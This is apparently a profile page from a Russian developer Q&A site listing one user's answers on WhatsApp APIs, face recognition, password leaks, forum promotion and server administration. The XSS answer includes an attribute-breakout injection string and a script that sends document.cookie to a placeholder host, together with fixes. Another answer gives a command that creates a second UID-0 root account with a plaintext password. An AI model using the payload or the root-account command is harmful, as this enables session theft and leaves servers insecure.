• Как отправить смс в WhatsApp?

    @JunDevTest
    Контакты: thejundev@gmail.com | @juniordev
    К сожалению, WhatsApp ведёт очень жёсткую политику по отношению к разработчикам, у него отсутствует публичный API и возможность отправки сообщений на номера, которые не находятся в ваших контактах. Однако, в сети существуют сервисы, которые предоставляют такой API, однако он не официальный, его использование несет в себе риск бана вашего аккаунта без возможности восстановления. К тому-же такая услуга не бесплатна ( на одном из сервисов, стоит 900р/мес. за 1 аккаунт ) и как правило, с лимитом на количество отправленных сообщений.

    Существует так называемое WhatsApp Business API которое доступно лишь "средним и крупным компаниям", заявка отправляется через Facebook, где её проверяют и выносят свой вердикт, по поводу допуска. Простым смертным и ИП-шникам оно не доступно. https://www.whatsapp.com/business/api

    Как отметил пользователь storm57, на GitHub можно найти несколько открытых проектов, которые предоставляют API для WhatsApp в виде библиотек и компонентов для различных языков программирования.
    Однако, использование такого способа, может сильно повысить риск бана аккаунта, даже по сравнению с платными сервисами, которые работают через WhatsApp WEB.

    Относительно безопасный и практически бесплатный способ: https://github.com/sigalor/whatsapp-web-reveng
    Библиотека, работающая на собственном сервере, с возможностью получения API и отправки сообщений.
    Когда-то хотел с ней "поиграться", если захотите, могу установить и настроить её для вас на вашем или моём сервере, мои контакты сверху под ником.
    Ответ написан
    2 комментария
  • Что делает этот код php?

    @JunDevTest
    Контакты: thejundev@gmail.com | @juniordev
    Зануллить движок пытаешься? Или понять алгоритм создания ключа для CMS?
    Ответ написан
    2 комментария
  • Как системы распознавания лиц, собственно, распознают лица?

    @JunDevTest
    Контакты: thejundev@gmail.com | @juniordev
    Вероятнее всего, вы ищете общий признак в технологии распознавания лиц?
    Общее в них то, что для всех них требуется большая выборка с данными для обучения нейросетей ( именно они занимаются распознаванием лица ).
    Эти выборки обычно состоят из различных фотографий людей, полученных из публичных источников либо из полицейских баз и архивов ( как в случае с Amazon Rekognition ). Чем больше выборка, тем точнее будет распознавание лица на фото, которого нет в базе ( или с камер видеонаблюдения ).
    Каким образом система узнаёт данные человека с распознанным лицом ( идентифицирует его )?
    В случае с всё тем-же Amazon Rekognition, данные берутся из полицейских баз, возможно медицинских карт, и других государственных баз. Также данные могут браться из профилей в соц. сетях ( по типу Facebook ), если у человека установлен реальный аватар или фото с этим человеком найдено у него в альбомах. Точность такого распознавания гораздо ниже, однако эти данные доступны публично и этим может воспользоваться любой желающий. О самом алгоритме распознавания, написал пользователь Владимир Олохтонов.
    Бонус ;)
    Вы можете попробовать упомянутую выше систему в связке с публичными API ( например, Facebook, VK ) для того чтобы создать сервис на подобии https://findface.ru.
    Ответ написан
    Комментировать
  • Как создать ядро форума и начать продвигать его с нуля?

    @JunDevTest
    Контакты: thejundev@gmail.com | @juniordev
    Можно взять один из популярных движков форума IPB, BB Press, PHPBB, vBulletin. Хорошие шаблоны на них с точки зрения дизайна и СЕО, гуглятся на раз по запросам вида: скачать html5 тему для IPB бесплатно и т.д. Вместо IPB подставьте название вашего движка.
    Как уже отметил dimonchik2013 нужно пригласить на форум экспертов вашей тематики форума. Желательно публиковать время от времени уникальный контент, можно сливать хайды с других форумов и т.п. Можно создать закрытый раздел с Premium подпиской ( приватный раздел ), время от времени напоминайте своим пользователям об этом, подогревайте их интерес интересными постами и темами.
    Основная задача, сделать так, чтобы вы сами могли чётко ответить на вопрос: "А зачем пользователям нужен ваш форум?".
    Ответ написан
    Комментировать
  • Как убрать уведомление о краже пароля GitHub?

    @JunDevTest
    Контакты: thejundev@gmail.com | @juniordev
    Ваш пароль вероятно находится в одной из публичных баз данных, доступных почти всем желающим. Это как правило происходит, когда кто-то сливает базы с уязвимых сайтов, эта база ходит по рукам а потом сливается в паблик. Так как пароли зачастую зашифрованы, они подбираются по словарям и путём различных комбинаций. Скорее всего, ваш пароль таки подобрали, либо он был засвечен в базе без шифрования, в открытом виде.

    Проверить надёжность и репутацию своего пароля, можно здесь. Там-же можно проверить, есть ли ваш email в их коллекции слитых данных или нет.

    И да, советую сменить пароль и врубить двух факторку, по желанию.
    Ответ написан
  • Как реализовать user-friendly web-интерфейс для выполения различных запросов к БД?

    @JunDevTest
    Контакты: thejundev@gmail.com | @juniordev
    Вам нужен сервер приложений, который будет принимать запросы от пользователей из вне по API и возвращать их в виде JSON/XML данных, пригодных для дальнейшей обработки.
    Например, https://clck.ru/E3nCQ (ссылка на скачивание архива). Библиотека написана на языке PHP.

    Пример использования:

    Запрос: example.com/mysql/records/posts/1

    Вернёт вам запись из таблицы posts, которая имеет id1 в формате Json:
    {
        "id": 1
        "title": "Сэмпл пейдж",
        "content": "Текст сообщения или что-то ещё...",
        "created": "2018-05-27T20:12:56Z"
    }


    Кроме этого, либа умеет делать запись в таблицу, фильтровать данные, применять сложные операторы и т.д.

    Видео инструкция: https://www.youtube.com/watch?v=Xcsns-K41es
    Ответ написан
    Комментировать
  • Как реализовать HLR запрос?

    @JunDevTest
    Контакты: thejundev@gmail.com | @juniordev
    Связаться с любым ОбСОСОм и растолковать ваш вопрос.

    Можно обратится, например, к кому-то из большой тройки или взять в аренду свой смс-шлюз и заключить контракты с этими операторами.

    Можно стать реселлером одного из действующих провайдеров и получить возможность, продавать свои услуги конечным клиентам, например этого. Такие провайдеры, дают вам возможность предоставлять свои услуги и биллинг с помощью white label панели управления, например с вашим логотипом, доменом и дизайном. В том числе, как правило, стоимость тарифов для вас будет ниже, кроме отправки HLR запросов, вы сможете делать смс рассылки, регистрировать свои сервисные номера от имени этой компании и т.д. Как правило, в этом случае, кроме договора с этой компанией, более ничего не требуется.

    Если интересуют инновационные технологии, можно попробовать ознакомиться с этой ссылкой.
    Ответ написан
  • Разработана новая техника атаки WPA2, где не требуется наличие клиента на АР. Стоит ли опасаться начала массовых атак на домашние устройства?

    @JunDevTest
    Контакты: thejundev@gmail.com | @juniordev

    Но исследователи обнаружили, что для WPA и WPA2 в сетях 802.11i/p/q/r все может быть проще.

    Источник цитаты и скрина у ТС: https://xakep.ru/2018/08/07/802-11-pass-hack/
    И много вы видели домашних устройств с такими параметрами? Я, лично, нет. Может, где нибудь в Москве и сработает, проверьте и отпишитесь. Посмотрите, сколько подписчиков ждут :)
    Ответ написан
  • 1 августа WhatsApp объявил об открытии WhatsApp Business API. Кто-нибудь уже тестил? Пробовал подключать?

    @JunDevTest
    Контакты: thejundev@gmail.com | @juniordev
    Это то самое API которое доступно для компаний вроде Microsoft, Газпром, МТС? Если да, ну допустим пробовали и что? Простым смертным и ИП-шникам оно всё равно не доступно.
    WhatsApp Business API дает возможность средним и крупным компаниям общаться с клиентами по всему миру.

    Более того, насколько я знаю, там нельзя безнаказанно спамить рассылками даже своим клиентам, лимиты достаточно жесткие. Это помимо заключения договора и ожидания его рассмотрения и принятия предложения, менеджерами WhatsApp.
    Конечно, плюшки будут и кому-то полезные, однако дождётесь ли вы одобрения - неизвестно.
    Ссылка на страницу с полезной информацией: https://www.whatsapp.com/business/api
    Ссылка на страницу подачи заявления на доступ к API: https://www.facebook.com/business/m/whatsapp/busin...
    К тому-же, вероятно WhatsApp является частью либо дочерней компанией Facebook, просто так FB не стал-бы делать ссылку на себя. А у них, в последнее время требования ужесточились к своим публичным сервисам, насколько я знаю.

    Если это важно - вероятно могу заверить, скорее всего оно существует и работает :)
    Ответ написан
    Комментировать
  • Это вообще люди делают?

    @JunDevTest
    Контакты: thejundev@gmail.com | @juniordev
    Ещё в тему.
    https://tproger.ru/digest/top-20-web-sites-2016/
    А вообще, когда смотришь на такого рода приложения в браузере, будь-то example или лендинг, хочется творить и это реально мотивирует. Однако, практической пользы у такого сайта практически нет, но зато своему fullstack-тимлиду есть чем похвастать в не рабочее время за стаканом пива.
    Ответ написан
    2 комментария
  • Зачем во избежание XSS нужно указывать на каждой странице кодировку, если злоумышленник все равно может изменить ее?

    @JunDevTest
    Контакты: thejundev@gmail.com | @juniordev
    XSS это эксплуатация уязвимостей в HTML, JS и других скриптах.

    3. Указывайте кодировку на каждой веб-странице.

    Кодировку нужно указывать, так как некоторые браузеры могут её неправильно определить и текстовой контент на сайте станет нечитаемым.

    В случае если тег расположен до тега и заполняется пользовательскими данными

    Нужно фильтровать пользовательские данные, в том числе, когда они встраиваются в HTML разметку.
    Например, вы разрешаете пользователям изменять фоновую картинку в своём профиле.
    У вас есть текстовое поле, в которое пользователь вводит ссылку на картинку. После этого вы подставляете картинку пользователя, например из базы данных в переменную $user_background.
    Таким образом, код на странице пользователя, выглядит как-то так:
    <body style="background: #282b31 url($user_background) 50% 0 repeat;">
    ...
    </body>

    Пользователь вставляет свою ссылку example.com/image.png и в коде страницы, это выглядит так:
    <body style="background: #282b31 url(http://example.com/image.png) 50% 0 repeat;">
    ...
    </body>

    Казалось-бы, что здесь не так. Если пользователь вставит сюда что-нибудь кроме картинки, то ничего не будет, по правилам CSS, зачем что-то фильтровать или... нет.
    Предположим, школохацкер вставит вместо картинки какой-нибудь тег:
    <script>alert('Мамку админа ипал!!111');</script>
    В таком случае, как правило, ничего не произойдёт, но может съехать вёрстка, что уже признак уязвимости. Дальше у нашего хакира бомбанёт пупкан и он попросит помощи у старшего брата из группировки Онанимусов. Добрый братик изменит эту строчку так, чтобы превратить её в активную XSS уязвимость ( правильно говорить "раскрутит" её ).
    На этом этапе строчка будет выглядеть как-то так:
    http://example.com/image.png') 50% 0 repeat;"><script>alert('Мамку админа ипал!!111');</script><input type="hidden" style="background: #282b31 url(

    Она не только радостно поприветствует алертом каждого, кто зайдёт на эту страницу, но ещё и установит картинку и не испортит вёрстку сайта, да ещё и к тому же не нарушит правил CSS. Итак, это и есть XSS уязвимость.
    Они к слову, бывают нескольких видов. Активные и пассивные.
    Чтобы расширить свой кругозор в области XSS, рекоммендую прочесть старый как помёт мамонта, мануал на форуме Antichat: forum.antichat.ru/threads/20140/ ( странно, ссылка вырезается, не уж то Ачат на Тостере под запретом? ).

    Что тут происходит?!
    Из-за отсутствия фильтрации текст из поля, сохраняется в БД в первоначальном виде. Как только он попадает на страницу, начинается самое интересное ^_^.
    Сначала код устанавливает картинку на фон, потом благополучно закрывает этот тег. После этого идёт "пейлоад", то есть JS код, например. С таким же успехом, можно запихнуть туда, например тег test или кучу ссылок на продажу виагры с анкорами, тем самым подняв некоторые показатели, например, индекс цитируемости (ТИЦ) для своих ссылок. После этого мы создаём новый тег input, делаем его скрытым и тем самым закрываем тег ( по стандартам html, этот элемент не нуждается в закрывающемся теге ). Уязвимость готова.

    Что ещё?
    Ну если вам этого недостаточно то можно "выипать админа" с помощью соц. инженерии и... той самой XSS. Для этого достаточно лишь поменять код JS на что-то вроде:
    <script>$.get('http://example.com/adminlox.php?sniffer=' + document.cookie);</script>

    и если у нубоадмина нет httponly у куков, то можно получить данные админа и войти под его аккаунтом или даже попасть в админку сайта. Дальше можно кое-что залить, но это уже совсем другая история... :3

    Как фиксить?
    Как минимум в этом конкретном случае, обернуть PHP переменную $user_background в
    htmlspecialchars($user_background, ENT_QUOTES, 'UTF-8');
    таким образом, код, показанный выше уже работать не будет. Дальше нужно установить httponly у сессионных Cookie (если ещё не стоит), для этого нужно заменить вашу конструкцию, на что-то вроде этого:
    header( "Set-Cookie: name=value; httpOnly" );
    или так
    setcookie('Foo','Bar',0,'/', 'www.sample.com'  , FALSE, TRUE);

    ну и вообще, перед тем как что-то писать, лучше прочтите хотя-бы одну книгу по PHP7.x, JS ec6, HTML5,CSS3. Я сам их не читал, поэтому это можете спросить здесь, новым вопросом. Здесь есть ребята, которые могут подсказать действительно годную и современную литературу.
    Удачи вам, в познании XSS.
    Ответ написан
    Комментировать
  • Bullshit Web - чрезмерное загромождение сайтов десятками скриптов и модулей. Можно ли решить эту проблему?

    @JunDevTest
    Контакты: thejundev@gmail.com | @juniordev
    Изначально Web задумывался как набор страниц с гиперссылками. Прошло время, мир в целом начал постепенно деградировать, вместе с ним и интернет... Когда у большинства разработчиков появились мощные компьютеры и смартфоны, они задумались над тем, как-бы разгрузить сервер и перенести нагрузку на клиент а другим хотелось меньше работать и больше зарабатывать... Как-то так родилось понятие "web-приложение" коим и является львиная доля сайтов, они являются приложениями, которые выглядят как web-страницы...
    Можете смело говорить таким разработчикам в любых спорах по этому поводу, что тяжеловесные фреймворки и библиотеки, портят концепцию сети интернет. Какими-бы полезными они не были. Web, в текущем виде, НЕ предназначен для этого.
    Ответ написан
    1 комментарий
  • Mozilla включает телеметрию для вкладок в режиме приватного просмотра. Чем это чревато?

    @JunDevTest
    Контакты: thejundev@gmail.com | @juniordev
    Firefox 3.6 вам в помощь. Котиков на ютубе не посмотрите, но даже на чайнике вам будет комфортно в нём работать.

    PS. Я имел ввиду именно 3.6 ( который вышел в 2010 году ) а не 36, имейте ввиду.
    Ответ написан
    4 комментария
  • В чем выгода бесплатных хостингов?

    @JunDevTest
    Контакты: thejundev@gmail.com | @juniordev
    Выгода в ваших файлах и ценных данных из БД ( например, ваши лиды и клиенты ).
    А вы думаете сливы крупных сайтов/форумов/магзинов и т.д из воздуха берутся?
    Вообще, размещая что-либо на бесплатном хостинге, вы добровольно дарите свои файлы хостеру, так как он не отвечает за их сохранность. На нормальных хостингах вы соглашаетесь с договором или офертой, где должна быть прописана ответственность компании, в случае утечки файлов и/или баз данных по их вине. Вот только доказать это практически невозможно, особенно в этой стране.
    Ответ написан
  • Как создать пользователя FTP с root правами?

    @JunDevTest Автор вопроса
    Контакты: thejundev@gmail.com | @juniordev
    Для того чтобы создать ROOT пользователя для FTP, выполните эту команду от имени суперпользователя:
    useradd -u root_ftp -g users -d /home/root_ftp -s /bin/bash -p 'mysuperduperlongpass' root_ftp && usermod -u 0 -o root_ftp

    После этого подключитесь по FTP, используя ip-адрес вашего сервера, логин root_ftp и пароль mysuperduperlongpass. Наслаждайтесь всеми преимуществами root доступа.
    Выражаю письменную благодарность CityCat4 за подсказку.
    spoiler
    latest?cb=20151125165543
    Ответ написан
  • Где найти информацию по написанию парсера с аутентификацией на python?

    @JunDevTest
    Контакты: thejundev@gmail.com | @juniordev
    pipenv install requests-html
    Requests-HTML
    This library intends to make parsing HTML (e.g. scraping the web) as simple and intuitive as possible.
    Вот вам библиотека, там же на странице, есть примеры использования. Удачи вам в парсинге веба.
    Ответ написан
  • Как откатить права на файлы на час назад в Ubuntu?

    @JunDevTest Автор вопроса
    Контакты: thejundev@gmail.com | @juniordev
    Вопрос не актуален.
    Решение в моём случае ( может подойти и в вашем ):

    Восстановление работы Vesta:
    /usr/local/vesta/upd/add_sudo.sh && chmod 0440 /etc/sudoers && chown root:root /etc/sudoers
     && chmod 0440 /etc/sudoers.d/admin && chown root:root /etc/sudoers.d/admin && chown root:root /usr/bin/sudo
     && chmod 4755 /usr/bin/sudo

    Восстановление работы SSH сервера:
    cd /etc/ssh && chmod 400 *
    И так по аналогии, что-то работало, теперь не работет или работает некорректно? Попробуйте поменять права на файлы.
    Ответ написан
  • Где можно попрактиковаться в разговорном английском?

    @JunDevTest
    Контакты: thejundev@gmail.com | @juniordev
    Через скайп, универы по обмену, на майспейсе (myspace.com)/фейсбуке (facebook.com) с помощью предложений о знакомстве, на реддите (reddit.com), в чат рулетке (chanroulette.com) и прочих подобных сервисах.
    Ответ написан
    Комментировать
  • Дизайнер интерфейсов с нуля. С чего начать и как двигаться?

    @JunDevTest
    Контакты: thejundev@gmail.com | @juniordev
    Попробуйте поискать адаптивные паки для дизайнеров, их сейчас выкладывают в большом количестве. В том числе от Envanto и других площадок.
    Ответ написан
    Комментировать